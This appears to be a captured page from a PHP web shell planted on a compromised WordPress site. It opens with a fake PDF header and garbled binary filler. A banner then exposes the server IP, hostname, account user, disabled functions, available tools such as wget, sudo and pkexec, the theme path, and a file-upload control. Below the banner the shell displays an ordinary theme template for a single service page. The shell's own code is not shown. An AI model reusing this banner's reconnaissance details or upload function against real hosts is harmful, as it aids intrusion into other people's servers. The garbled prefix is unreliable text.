...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 65.108.66.160 / Your IP : 216.73.217.50 Web Server : Apache System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64 User : alasaweborg ( 1047) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/alasaweborg/public_html/wp-content/themes/greenture/ |
Upload File : |
<?php
/**
* Single Service Page
*
* @package greenture
*/
get_header(); ?>
<div class="container">
<div id="main-wrapper" class="tpath-row row">
<div id="single-sidebar-container" class="single-sidebar-container main-col-full">
<div class="tpath-row row">
<div id="primary" class="content-area col-md-9 col-sm-12">
<div id="content" class="site-content">
<?php if ( have_posts() ):
while ( have_posts() ): the_post();
$service_full_img = wp_get_attachment_image_src( get_post_thumbnail_id( $post->ID ), 'greenture-blog-large' );
$service_img = wp_get_attachment_image_src( get_post_thumbnail_id( $post->ID ), 'full' );
$service_content_block = get_post_meta( $post->ID, 'greenture_service_content_block', true );?>
<div class="service-single-wrapper">
<div class="service-single-inner clearfix">
<div <?php post_class(); ?> id="service-<?php the_ID(); ?>">
<div class="post-content service-item">
<?php if ( has_post_thumbnail() && ! post_password_required() ) { ?>
<div class="service-image-wrapper">
<?php echo get_the_post_thumbnail(get_the_ID(), 'large'); ?>
</div>
<?php } ?>
<div class="entry-header services-entry-header">
<div class="clearfix row">
<div class="col-md-8 col-sm-12">
<?php echo wp_kses_post(greenture_blog_title()); ?>
</div>
<div class="col-md-4 col-sm-12 pull-right text-right">
<?php
$services_btn_name = get_post_meta( get_the_ID(), 'greenture_services_btn_name', true );
$services_btn_link = get_post_meta( get_the_ID(), 'greenture_services_btn_link', true );
if( isset( $services_btn_link ) && $services_btn_link != '' ): ?>
<a href="<?php echo esc_url($services_btn_link); ?>" class="services-entry-btn btn button-type-one">
<?php echo esc_attr($services_btn_name); ?></a>
<?php endif; ?>
</div>
</div>
</div>
</div>
<div class="entry-content">
<?php the_content(); ?>
</div>
<hr />
</div>
<?php greenture_related_service_items(); ?>
</div>
</div><!-- .service-single-wrapper -->
<?php endwhile;
else : ?>
<?php get_template_part( 'content', 'none' ); ?>
<?php endif; ?>
</div><!-- #content -->
</div><!-- #primary -->
<div class="col-md-3 col-sm-12">
<?php dynamic_sidebar( 'primary' ); ?>
</div>
</div>
</div><!-- #single-sidebar-container -->
</div><!-- #main-wrapper -->
</div><!-- .container -->
<?php if( isset( $service_content_block ) && ( $service_content_block != '' && $service_content_block != 0 ) ) {
echo wp_kses_post(greenture_block( $service_content_block ));
} ?>
<?php get_footer(); ?>